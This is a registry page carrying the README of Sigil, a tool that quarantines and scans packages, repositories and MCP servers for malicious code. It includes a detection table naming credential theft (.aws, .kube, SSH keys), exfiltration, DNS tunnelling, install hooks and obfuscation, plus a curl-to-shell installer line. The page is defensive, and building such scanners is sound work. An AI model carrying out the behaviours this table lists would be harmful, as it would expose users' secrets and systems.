Package Exports

This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (@nomarj/sigil) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.

Readme

SIGIL

Automated security auditing for AI agent code

A protective mark for every line of code.
by NOMARK

Sigil scans repositories, packages, MCP servers, skills, and agent tooling for malicious patterns before they reach your working environment. Nothing runs until it's been scanned, scored, and explicitly approved.

The AI tooling ecosystem moves fast. Developers clone repos from tutorials, install MCP servers with 12 GitHub stars, and pull agent skills from Discord — all of which get direct access to API keys, databases, and cloud credentials. Traditional dependency scanners catch known CVEs but miss the real threat: intentionally malicious code designed to exfiltrate credentials, establish backdoors, or execute arbitrary commands via install hooks.

Sigil fills this gap with a quarantine-first approach.

Quick Install

Homebrew (macOS/Linux):

brew tap nomarj/tap
brew install sigil

npm (All platforms):

npm install -g @nomark/sigil

Cargo (Rust):

cargo install sigil

curl installer:

curl -sSL https://sigilsec.ai/install.sh | sh

Docker:

docker pull nomark/sigil:latest
docker run --rm -v $(pwd):/workspace nomark/sigil scan .

→ See all installation methods

How It Works

┌──────────────┐     ┌──────────────┐     ┌──────────────┐
│  You run a   │────▶│  Sigil       │────▶│  Clean?      │
│  command     │     │  quarantines │     │  Approve.    │
│              │     │  & scans     │     │  Dirty?      │
│  gclone      │     │              │     │  Reject.     │
│  safepip     │     │  6 phases.   │     │              │
│  safenpm     │     │  <3 seconds. │     │  You decide. │
└──────────────┘     └──────────────┘     └──────────────┘

Sigil runs six analysis phases on every scan:

Phase	What It Catches
Install Hooks	`setup.py` cmdclass, npm `postinstall`, Makefile targets that execute on install
Code Patterns	`eval()`, `exec()`, `pickle.loads`, `child_process`, dynamic imports
Network / Exfil	Outbound HTTP, webhooks, socket connections, DNS tunnelling
Credentials	ENV var access, `.aws`, `.kube`, SSH keys, API key patterns
Obfuscation	Base64 decode, charCode, hex encoding, minified payloads
Provenance	Git history depth, author count, binary files, hidden files

Each finding is weighted and scored. You get a clear verdict:

Score	Verdict	What Happens
0	CLEAN	Auto-approve (configurable)
1–9	LOW RISK	Approve with review
10–24	MEDIUM RISK	Manual review required
25–49	HIGH RISK	Blocked, requires override
50+	CRITICAL	Blocked, no override

Usage

Core Commands

# Clone a repo into quarantine, scan it, get a verdict
sigil clone https://github.com/someone/cool-mcp-server

# Download and scan a pip package before installing
sigil pip some-agent-toolkit

# Download and scan an npm package before installing
sigil npm langchain-community-plugin

# Scan a directory or file already on disk
sigil scan ./downloaded-skill/

# Download and scan any URL
sigil fetch https://example.com/agent-tool.tar.gz

# Manage quarantine
sigil list              # See all quarantined items
sigil approve abc123    # Move approved code out of quarantine
sigil reject abc123     # Permanently delete quarantined code

Shell Aliases

After running sigil install, these aliases are available in every terminal session. Use the commands you already know — Sigil protects you automatically:

Alias	What It Does
`gclone <url>`	`git clone` with quarantine + scan
`safepip <pkg>`	`pip install` with scan first
`safenpm <pkg>`	`npm install` with scan first
`safefetch <url>`	Download + quarantine + scan
`audithere`	Scan current directory
`qls`	Quarantine status
`qapprove` / `qreject`	Approve or reject most recent item

Git Hooks

# Auto-scan any repo on clone (global git hook)
sigil install --git-hooks

IDE & Agent Integrations

Sigil works where you work. Install the plugin for your editor, or connect AI agents via MCP:

Integration	Coverage	Install
VS Code / Cursor / Windsurf	Scan workspace, files, selections, packages. Findings in Problems panel.	plugins/vscode
JetBrains IDEs	IntelliJ, WebStorm, PyCharm, GoLand, CLion, etc. Tool window + inline annotations.	plugins/jetbrains
Claude Code (MCP)	6 tools: scan, scan_package, clone, quarantine, approve, reject.	plugins/mcp-server
GitHub Actions	Run Sigil as a CI check on every PR.	action.yml

{
  "mcpServers": {
    "sigil": {
      "command": "node",
      "args": ["/path/to/sigil/plugins/mcp-server/dist/index.js"]
    }
  }
}

Build the MCP server first if you haven't already:

cd plugins/mcp-server && npm install && npm run build

npx @nomark/sigil-mcp-server will be available once the package is published to npm.

Threat Intelligence

When authenticated (sigil login), Sigil connects to a community-powered threat intelligence database. Every scan from every user contributes anonymised pattern data. When someone flags a malicious package, the threat signature propagates to all users within minutes.

No source code is ever transmitted — only pattern match metadata (which rules triggered, file types, risk scores).

Offline mode: All six scan phases run locally without authentication. Threat intelligence lookups are skipped, but you still get full local analysis.

# Authenticate to enable threat intel
sigil login

Learn more about authentication →

Why Not [Existing Tool]?

Capability	Sigil	Snyk	Socket.dev	Semgrep	CodeQL
Quarantine workflow	✅	❌	❌	❌	❌
AI agent / MCP focus	✅	❌	Partial	❌	❌
Install hook scanning	✅	❌	✅	❌	❌
Credential exfil detection	✅	❌	Partial	Rules needed	Rules needed
Multi-ecosystem (pip, npm, git, URL)	✅	✅	npm only	Any (rules)	GitHub only
Community threat intel	✅	Advisory DB	✅	Community	❌
Free tier with full CLI	✅	Limited	Limited	OSS free	Public repos

Snyk and Dependabot flag known CVEs in dependency trees — they don't scan source code for intentional malice. Socket.dev is npm-only. Semgrep is a pattern engine, not an end-to-end workflow. CodeQL requires GitHub hosting. None of them quarantine code before it runs.

Pricing

The CLI is free and open source with all six scan phases. Paid tiers add cloud-backed threat intelligence, scan history, team management, and CI/CD integration.

	Open Source	Pro — $29/mo	Team — $99/mo
Full CLI scanning	✅	✅	✅
Cloud threat intelligence	—	✅	✅
Scan history	—	90 days	1 year
Web dashboard	—	✅	✅
Team management & policies	—	—	Up to 25 seats
CI/CD integration	—	—	✅
Slack / webhook alerts	—	—	✅

See full pricing →

Documentation

Comprehensive documentation is available in the docs/ directory:

Getting Started:

Getting Started Guide — Installation and first scan
CLI Reference — All commands and options
Authentication Guide — Connect to Sigil Pro ⭐ NEW
Configuration — Environment variables and settings

Technical Deep Dives:

Architecture Overview — System design
Detection Patterns — What Sigil scans for
Threat Intelligence 2025 — Current threat landscape
API Reference — REST API endpoints

Integration Guides:

CI/CD Integration — GitHub Actions, GitLab CI, etc.
IDE Plugins — VS Code, JetBrains setup
MCP Server — Use Sigil as an MCP tool for AI agents

Security Research:

Case Study: OpenClaw Attack — Real-world supply chain attack
Prompt Injection Patterns — Detection techniques
Malicious Signatures — Threat signature database

Browse all documentation →

Roadmap

See ROADMAP.md for the full roadmap.

Today: Quarantine-first scanning for pip, npm, and git repos. Six-phase behavioral detection. Cloud threat intelligence with community reporting and signature sync. Dashboard with scan history, team management, and policy controls. Rust CLI binary, VS Code / Cursor / Windsurf extension (.vsix), JetBrains plugin, MCP server for AI agents, and GitHub Actions integration.

Now: Hosted cloud — sign up and scan without running infrastructure.

Next: Homebrew tap and npm package. Docker image and Go/Cargo scanning. VS Code Marketplace and JetBrains Marketplace listings. Custom scan rules via YAML. Enterprise SSO, RBAC, and audit logs. GitLab, Jenkins, and CircleCI integrations.

Contributing

We welcome contributions. See CONTRIBUTING.md for guidelines.

Security

Found a vulnerability? Please report it responsibly. See SECURITY.md.

License

Apache 2.0 — see LICENSE for details.

SIGIL by NOMARK
A protective mark for every line of code.